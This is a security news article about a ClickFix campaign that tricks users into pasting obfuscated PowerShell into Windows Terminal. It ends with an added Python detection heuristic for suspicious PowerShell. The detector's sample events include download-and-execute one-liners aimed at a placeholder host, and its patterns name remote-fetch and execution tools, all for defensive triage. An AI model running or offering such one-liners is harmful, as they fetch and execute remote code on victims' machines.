Hackers Exploit Windows Terminal In New ClickFix Malware Attack

Security researchers have identified a new ClickFix social engineering campaign that abuses Windows Terminal to execute malicious payloads on compromised systems.

The activity, observed by Microsoft Defender experts in February 2026, shows attackers evolving their techniques to bypass common security detections and make malicious instructions appear more legitimate to users.

ClickFix attacks rely heavily on social engineering. Instead of exploiting software vulnerabilities, attackers trick victims into running malicious commands themselves.

In this campaign, the attackers changed their execution method, directing victims to launch Windows Terminal rather than the traditional Windows Run dialog. This subtle change helps the attack blend into normal administrative workflows.

New Execution Technique Using Windows Terminal

Previous ClickFix campaigns commonly instructed victims to press Win + R, paste a command, and execute it through the Run dialog.

Security tools and monitoring systems have increasingly learned to detect this behavior pattern. To evade those defenses, attackers now guide victims to press Windows + X and then I to launch Windows Terminal (wt.exe).

Windows Terminal is a legitimate command-line environment used by developers and administrators to run PowerShell, Command Prompt, and other shell environments.

Because it is widely used for system management tasks, launching it does not immediately appear suspicious. This makes the method more convincing to users and harder for automated security systems to flag as malicious activity.

ClickFix Attack Targets Windows (Source: MsftSecIntel)

Once the terminal opens, victims are instructed to paste a PowerShell command supplied by the attacker.

These commands are typically obfuscated and designed to download or execute additional malware from remote servers. The execution occurs directly within the terminal environment, allowing attackers to establish an initial foothold on the system.

Social Engineering Lures Deliver The Payload

The malicious instructions are delivered via deceptive websites and prompts that appear harmless.

Victims may encounter fake CAPTCHA pages, system verification messages, or troubleshooting instructions that claim the user must copy and paste a command to resolve an issue or confirm they are human.

These prompts are carefully crafted to mimic legitimate technical instructions. For example, the page might claim that the command is required to verify the user’s browser, repair a connection issue, or enable access to protected content.

Because the steps resemble routine troubleshooting tasks, victims may follow them without realizing they are executing malicious code.

By using Windows Terminal as the execution environment, attackers gain several advantages.

The technique bypasses security detections that focus on Run dialog abuse, reduces suspicion among users familiar with command-line tools, and provides a direct way to run PowerShell payloads with fewer restrictions.

Security experts recommend that organizations educate users about copy-paste attacks and closely monitor suspicious PowerShell activity.

Blocking untrusted scripts, restricting administrative command execution, and improving user awareness can help reduce the risk posed by evolving ClickFix campaigns.
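
One way to act on the advice to monitor suspicious PowerShell activity, shown as an added example that is not from the article or from Microsoft: a triage heuristic that flags command text combining a remote fetch with dynamic execution, and that decodes `-EncodedCommand` arguments before scoring. It assumes command text has already been exported from PowerShell logging into hypothetical `id`/`text` fields; the indicator list and threshold are illustrative, and the sample events are constructed.

```python
import base64
import re

# Heuristic indicators for pasted one-liners that fetch and run remote content.
INDICATORS = {
    "network_fetch": re.compile(
        r"\b(invoke-webrequest|iwr|invoke-restmethod|irm)\b|downloadstring|net\.webclient", re.I),
    "dynamic_exec": re.compile(r"\b(invoke-expression|iex)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}
# Any prefix of -EncodedCommand followed by a long base64 run.
ENCODED_ARG = re.compile(r"(?<!\w)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_layers(text):
    """Return the text of every -EncodedCommand argument that decodes cleanly."""
    layers = []
    for match in ENCODED_ARG.finditer(text):
        try:
            layers.append(base64.b64decode(match.group(1), validate=True).decode("utf-16-le"))
        except ValueError:  # covers invalid base64 and invalid UTF-16
            continue
    return layers

def indicators(text):
    """Names of all indicators found in the command or in its decoded layers."""
    layers = decode_layers(text)
    hits = {"encoded_command"} if layers else set()
    for blob in [text, *layers]:
        hits |= {name for name, rx in INDICATORS.items() if rx.search(blob)}
    return hits

def triage(events, threshold=2):
    """Map event id -> sorted indicator names for events at or above the threshold."""
    scored = {e["id"]: sorted(indicators(e["text"])) for e in events}
    return {eid: hits for eid, hits in scored.items() if len(hits) >= threshold}

# Constructed sample events (hypothetical fields; example.invalid is a placeholder host).
_inner = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')"
SAMPLE_EVENTS = [
    {"id": 1, "text": "Get-ChildItem C:\\Users | Sort-Object Length"},
    {"id": 2, "text": "iex (iwr 'https://example.invalid/verify.ps1' -UseBasicParsing)"},
    {"id": 3, "text": "powershell -w hidden -enc "
                      + base64.b64encode(_inner.encode("utf-16-le")).decode()},
    {"id": 4, "text": "Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

Event 4, a plain file download, trips only one indicator and stays below the threshold, which is the trade-off to tune against an environment's normal administrative activity.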


The post Hackers Exploit Windows Terminal In New ClickFix Malware Attack appeared first on Cyber Security News.

